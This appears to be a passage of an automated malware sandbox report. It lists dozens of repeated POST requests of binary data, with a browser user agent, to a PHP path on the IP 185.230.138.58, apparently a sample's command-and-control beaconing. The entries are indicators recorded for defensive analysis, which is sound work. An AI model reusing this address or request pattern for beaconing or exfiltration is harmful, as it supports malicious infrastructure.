                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1868Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1868Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1880Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
